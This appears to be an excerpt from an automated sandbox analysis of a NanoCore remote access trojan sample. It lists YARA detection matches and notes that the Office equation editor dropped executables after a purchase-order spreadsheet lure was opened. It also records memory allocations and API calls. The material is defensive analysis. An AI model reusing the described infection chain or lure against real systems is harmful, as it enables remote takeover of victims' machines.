Source: 5.2.vbc.exe.57b4c9f.30.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 7.2.opjlpsercy.exe.219b958.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 7.2.opjlpsercy.exe.219b958.2.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 5.2.vbc.exe.57b0000.29.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 5.2.vbc.exe.44c0000.10.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 5.2.vbc.exe.44c0000.10.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 5.2.vbc.exe.55d0000.22.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 5.2.vbc.exe.415058.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 5.2.vbc.exe.415058.0.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 5.2.vbc.exe.55c0000.21.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 7.1.opjlpsercy.exe.415058.1.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 7.1.opjlpsercy.exe.415058.1.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 4.2.vbc.exe.1da0000.3.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 4.2.vbc.exe.1da0000.3.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 5.2.vbc.exe.5620000.25.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 5.1.vbc.exe.415058.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 5.1.vbc.exe.415058.1.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 5.2.vbc.exe.5460000.19.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 4.2.vbc.exe.1db1458.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 4.2.vbc.exe.1db1458.4.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 5.2.vbc.exe.55c0000.21.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 7.2.opjlpsercy.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 7.2.opjlpsercy.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 5.2.vbc.exe.4c60000.13.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 7.2.opjlpsercy.exe.3339f42.8.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 7.2.opjlpsercy.exe.3339f42.8.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 7.2.opjlpsercy.exe.4430000.10.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 7.2.opjlpsercy.exe.4430000.10.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 7.2.opjlpsercy.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 7.2.opjlpsercy.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 7.2.opjlpsercy.exe.3346174.6.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 5.2.vbc.exe.57e0000.31.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 5.2.vbc.exe.4c60000.13.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 5.2.vbc.exe.57b0000.29.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 5.2.vbc.exe.5070000.17.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 7.2.opjlpsercy.exe.3173258.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 7.2.opjlpsercy.exe.3173258.5.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 5.2.vbc.exe.33c9f42.6.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 5.2.vbc.exe.33d6174.8.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 5.2.vbc.exe.33d6174.8.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 5.1.vbc.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 5.1.vbc.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 5.2.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 5.2.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>

Office equation editor drops PE file

Show sources

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\new[1].exe			Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\Public\vbc.exe			Jump to dropped file

Source: C:\Users\Public\vbc.exe	Memory allocated: 76E20000 page execute and read and write
Source: C:\Users\Public\vbc.exe	Memory allocated: 76D20000 page execute and read and write
Source: C:\Users\Public\vbc.exe	Memory allocated: 76E20000 page execute and read and write
Source: C:\Users\Public\vbc.exe	Memory allocated: 76D20000 page execute and read and write
Source: C:\Users\user\AppData\Roaming\monsuyajo\opjlpsercy.exe	Memory allocated: 76E20000 page execute and read and write
Source: C:\Users\user\AppData\Roaming\monsuyajo\opjlpsercy.exe	Memory allocated: 76D20000 page execute and read and write
Source: C:\Users\user\AppData\Roaming\monsuyajo\opjlpsercy.exe	Memory allocated: 76E20000 page execute and read and write
Source: C:\Users\user\AppData\Roaming\monsuyajo\opjlpsercy.exe	Memory allocated: 76D20000 page execute and read and write
Source: C:\Users\user\AppData\Roaming\monsuyajo\opjlpsercy.exe	Memory allocated: 76E20000 page execute and read and write
Source: C:\Users\user\AppData\Roaming\monsuyajo\opjlpsercy.exe	Memory allocated: 76D20000 page execute and read and write

Source: C:\Users\Public\vbc.exe	Code function: 5_2_005C1586 NtQuerySystemInformation,
Source: C:\Users\Public\vbc.exe	Code function: 5_2_005C154B NtQuerySystemInformation,

Source: C:\Users\Public\vbc.exe

Code function: 4_2_0040323C EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcmpiA,CreateDirectoryA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,

Source: C:\Users\Public\vbc.exe	Code function: 4_2_00404853
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00406131
Source: C:\Users\Public\vbc.exe	Code function: 4_2_72FE1A98
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0040A2A5
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00522418
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00523020
Source: C:\Users\Public\vbc.exe	Code function: 5_2_005238C8
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00529D18
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00529118
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0052EA80
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0052C3E0
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0052B7E0
Source: C:\Users\Public\vbc.exe	Code function: 5_2_005230E7
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0052C4A7
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00529DDF
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0052C3CF
Source: C:\Users\Public\vbc.exe	Code function: 5_1_0040A2A5
Source: C:\Users\user\AppData\Roaming\monsuyajo\opjlpsercy.exe	Code function: 6_2_70D01A98
Source: C:\Users\user\AppData\Roaming\monsuyajo\opjlpsercy.exe	Code function: 7_2_0040A2A5
Source: C:\Users\user\AppData\Roaming\monsuyajo\opjlpsercy.exe	Code function: 7_2_01E83020
Source: C:\Users\user\AppData\Roaming\monsuyajo\opjlpsercy.exe	Code function: 7_2_01E82418
Source: C:\Users\user\AppData\Roaming\monsuyajo\opjlpsercy.exe	Code function: 7_2_01E830E7
Source: C:\Users\user\AppData\Roaming\monsuyajo\opjlpsercy.exe	Code function: 7_1_0040A2A5

Source: Purchase Order Price List 061021.xlsx

OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false

Source: C:\Users\Public\vbc.exe	Code function: String function: 00401ED0 appears 46 times
Source: C:\Users\Public\vbc.exe	Code function: String function: 0040569E appears 36 times
Source: C:\Users\user\AppData\Roaming\monsuyajo\opjlpsercy.exe	Code function: String function: 00401ED0 appears 46 times
Source: C:\Users\user\AppData\Roaming\monsuyajo\opjlpsercy.exe	Code function: String function: 0040569E appears 36 times

Source: 00000005.00000002.2359891154.00000000055B0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000005.00000002.2359891154.00000000055B0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000005.00000002.2357227032.00000000044C2000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000005.00000002.2357227032.00000000044C2000.00000040.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000006.00000002.2194726397.0000000001C80000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000006.00000002.2194726397.0000000001C80000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000005.00000002.2359835879.0000000005450000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000005.00000002.2359835879.0000000005450000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000007.00000001.2192160089.0000000000414000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000007.00000001.2192160089.0000000000414000.00000040.00020000.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000005.00000002.2357038377.00000000043A0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000005.00000002.2357038377.00000000043A0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000007.00000002.2207095611.000000000217E000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000005.00000002.2359682562.0000000005070000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000005.00000002.2359682562.0000000005070000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000005.00000002.2359847913.0000000005460000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000005.00000002.2359847913.0000000005460000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000007.00000002.2206463442.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000007.00000002.2206463442.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000005.00000002.2360021301.0000000005620000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000005.00000002.2360021301.0000000005620000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000005.00000002.2360175265.00000000057E0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000005.00000002.2360175265.00000000057E0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000005.00000002.2359928883.00000000055D0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000005.00000002.2359928883.00000000055D0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000005.00000002.2359948690.00000000055E0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000005.00000002.2359948690.00000000055E0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000005.00000001.2155256046.0000000000414000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000005.00000001.2155256046.0000000000414000.00000040.00020000.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000007.00000002.2207202360.0000000003171000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000007.00000002.2207202360.0000000003171000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000004.00000002.2157666765.0000000001DA0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000004.00000002.2157666765.0000000001DA0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000005.00000002.2359904698.00000000055C0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000005.00000002.2359904698.00000000055C0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000007.00000002.2208042866.0000000004432000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000007.00000002.2208042866.0000000004432000.00000040.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000007.00000002.2207350789.00000000031FC000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000005.00000002.2355089407.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000005.00000002.2355089407.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000005.00000002.2356006744.0000000002201000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000007.00000002.2207760336.0000000004310000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000007.00000002.2207760336.0000000004310000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000005.00000002.2357138327.0000000004430000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000005.00000002.2357138327.0000000004430000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000005.00000002.2357138327.0000000004430000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000005.00000002.2358435982.00000000049D0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000005.00000002.2358435982.00000000049D0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000005.00000002.2360005099.0000000005610000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000005.00000002.2360005099.0000000005610000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000007.00000002.2207916460.00000000043A0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000007.00000002.2207916460.00000000043A0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000007.00000002.2207916460.00000000043A0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
